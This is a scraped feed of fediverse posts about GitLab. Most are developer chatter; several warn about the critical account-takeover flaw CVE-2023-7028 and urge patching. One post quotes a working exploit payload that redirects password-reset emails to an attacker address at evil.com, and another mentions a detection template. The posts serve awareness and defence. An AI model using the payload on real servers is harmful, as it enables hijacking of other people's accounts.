phiofx, to fediverse

With exploring support the plot thickens.

Many people use for visibility and discovery of their projects. Alternative patterns that make network effects of "winner-takes-all" centralization less oppressive are great.

Another win is simply more eyeballs and brains to push the federation vision technically.

Maybe most importantly, this trend will help expand the beyond meme sharing echo-chambers into meaningful, long-term valuable content.

Real stuff.

joseprous, to fediverse
YourAnonRiots, to Cybersecurity Japanese

Hackers could write ANY file on your server while creating a workspace. This critical flaw (CVE-2024-0402) affects all versions before 16.5.8!

Patch NOW. https://thehackernews.com/2024/01/urgent-upgrade-gitlab-critical.html

sonny, to cochlearimplants
@sonny@floss.social avatar

One trick to make your life much better as a maintainer and help contributors

Have a Makefile directive to run everything that runs on CI

make x is all it should take to verify the changes pass automated tests

Linter, formatter, sorter, unit tests, etc

If tooling is needed then add a make setup directive that takes care of installing it

#offlinefirst #ci #development #git #GitHub #GitLab #Codeberg #dx #FreeSoftware #FLOSS #developerExperience #developer

semioticrobotic, to random

Just announced: now integrates with the @chaoss project's DEI Badging Program (https://go.gitlab.com/odEVaU). What a great day for open source on GitLab and the global open source ecosystem. GitLab is the first project using GitLab to be badged, but the honor of being No. 2 goes to the inimitable @kalilinux! Congratulations to our partner!

benzogaga33, to random French
@benzogaga33@mamot.fr avatar

GitLab (CVE-2023-7028) – Plus de 5 000 serveurs exposés à des attaques, dont près de 300 en France ! https://www.it-connect.fr/gitlab-cve-2023-7028-plus-de-5-000-serveurs-exposes-a-des-attaques/

rabc, to github

I think it would be useful if and had for repository activity. I’d love to track some repositories from my timeline.

juliensalort, to sysadmin French
@juliensalort@physfluids.fr avatar

J'ai été victime d'un piratage de mon instance GItlab. J'ai l'impression que la personne a utilisé la vulnérabilité CVE-2023-7028 pour changer le mot de passe du compte admin de l'instance (j'étais en version 16.3.6). D'après les logs, il s'est pas connecté ensuite. L'attaque provient de 3.142.114.26 et whois me dit que c'est Amazonaws. Mais je vois pas d'email d'abuse? Est-ce qu'il y a une procédure de signalement?

amadeus, to bitwarden
@amadeus@mstdn.social avatar

1/2 I currently use a very good but still somewhat limited (also in terms of performance) shared service from Switzerland. I , and others. In the future I'd like to self host , , and as well.

Joseph_of_Earth, to random
@Joseph_of_Earth@fosstodon.org avatar

Thank you to @itguyeric for letting me know that GitLab has dark mode! I no longer am blinded when contributing in the evenings!

jwildeboer, to random
@jwildeboer@social.wildeboer.net avatar

Hm. It seems I cannot create a hierarchy of teams and projects in the way I can in . In the forgejo/gitea world you have organisations and teams. But you cannot have teams under teams. Which is a bit limiting, IMHO. Or am I missing something?

simontsui, to random

VulnCheck wrote about 7777-Botnet with the following information:

  • 7777-Botnet remains active, and VulnCheck used co-located services to theorize the botnet is infecting TP-Link, Xiongmai, and Hikvision devices using CVE-2017-7577, CVE-2018-10088, CVE-2022-45460, CVE-2021-36260, and/or CVE-2022-24355.
  • The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume.
  • The botnet doesn’t just start a service on port 7777. It also spins up a SOCKS5 server on port 11228.

🔗 https://vulncheck.com/blog/ip-intel-7777-botnet

gittaca, to LLMs

Amazing how fans of code #LLMs overlook inconvenient details in industry's own surveys:
> … respondents with more #AI experience were less
> likely to associate AI with productivity gains …
> --https://www.theregister.com/2023/09/05/gitlab_ai_coding/ #theRegister

Sounds like it can replace/augment those with experience levels #lmgt4y #StackOverflow #StackExchange
But actual specialists? Have -1 incentive now to write down their experience. 📉trends ensue.

#GenerativeAI #GitHub #CoPilot #GitLab #Tab9 #Anthropic #Degrowth

nerdeiro, to homelab

I'm moving away from #gitlab on my #homelab. It's not that I don't like it, I do. A lot. But it's way too much for my humble needs, so I moved all my local repos to #forgejo with #woodpecker for CI/CD.

I just finished the pipeline that builds and publishes my blog and it's working nicely.

praveen, to debian

We are working on rebuilding 16.6.x on .

It is a good way to start contributing to debian as rebuilding is usually very simple.

I'd be happy to help if you are interested to join the effort.

We have to do this once in a month or two months usually.

This is the list of packages we need to rebuild.

https://storm.debian.net/grain/zgriFDoyuAzzWBTodnaD6Z

and this is the list of steps we usually need https://salsa.debian.org/ruby-team/gitlab/-/wikis/bookworm-backports

You can also contribute by testing the gitlab packages.

Xitnelat, to random German
@Xitnelat@wue.social avatar

Momente, in denen Du (hoffentlich) froh bist, dass Du ein #Backup hast... 😕
#ausGründen #gitlab #docker

jwildeboer, to random
@jwildeboer@social.wildeboer.net avatar

Dear @bagder Thank you a gazillion again for that just allowed me to fill a instance with issues having creation dates in the past.

snafu, to security

So, in case anyone still thinks that patching and security in general is not so important nowadays: Found already several tries of exploiting the recent critical CVE-2023-7028 vulnerability in the logs of my GitLab instance although it was only published a few days ago.

Conclusion:
✅ Install security updates literally ASAP.
✅ Turn on mandatory 2FA for all users.

#GitLab #CVE #2FA #Security #Hacker #Update

certbund, to random German

❗️❗️
Eine kritische in erlaubt es Konten ohne 2FA zu übernehmen. Durch die Veröffentlichung eines Proof-of-Conecepts ist von einer stattfindenden Ausnutzung auszugehen.
https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-205245-1032

feudjais, to random French
@feudjais@eldritch.cafe avatar

Si vous avez des vieilles instances , message d'utilité publique : faites la dernière mise à jour !

Une faille permet de passer admin d'une instance via une requête POST, sans compte.

raptor, to random

for CVE-2023-7028

https://github.com/Vozec/CVE-2023-7028

Simple payload:
user[email][]=my.target@example.com&user[email][]=hacker@evil.com

🤦 🤦‍♀️ 🤦‍♂️

smach, to OpenAI
@smach@masto.machlis.com avatar

Melissa Van Bussel: “📹 My latest video is all about how to use R to interact with APIs, using the httr2 package. No background knowledge about APIs is necessary ☺️ 🔗Check it out here: https://youtu.be/8tilyqp4bZY?si=9DqhrOfSCbrqUfIt
Uses and APIs

@rstats

h4sh, to random

#GitLab #cve unauthenticated password reset account takeover (CVSS 10.0) CVE-2023-7028

Very simple to exploit, attacker can receive the password reset email for any known user with any email address.

PoC is public and available. Please patch ASAP. You are not affected if you've enforced MFA for all users (as they will be able to reset password but can't login).

#Nuclei template here waiting to merge: https://github.com/projectdiscovery/nuclei-templates/pull/8934

harrysintonen, to random

The allowing trivial account hijacking (CVE-2023-7028) will lead to ton of problems: It will allow malicious actors to perform - something that will allow attacker to gain access to 3rd party who don't themselves run GitLab but just include from projects that do. I would suggest great caution regardless if you run GitLab yourself or not.

Naturally anyone using GitLab themselves must update as soon as possible. I would also suggest performing forensic investigation to find out if you have already been compromised, and take further action in case compromise has already occurred. Check "Were any accounts actually compromised due to this vulnerability?" section in this post for details: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/

brokenix, to random
@brokenix@emacs.ch avatar

vs for federating your self hosted code , of course if you know how secure it is and what are you doing

  • All
  • Subscribed
  • Moderated
  • Favorites
  • anitta
  • InstantRegret
  • everett
  • ethstaker
  • magazineikmin
  • cubers
  • rosin
  • thenastyranch
  • Youngstown
  • mdbf
  • slotface
  • khanakhh
  • kavyap
  • DreamBathrooms
  • JUstTest
  • cisconetworking
  • GTA5RPClips
  • tester
  • Leos
  • tacticalgear
  • osvaldo12
  • Durango
  • ngwrru68w68
  • megavids
  • provamag3
  • normalnudes
  • modclub
  • lostlight
  • All magazines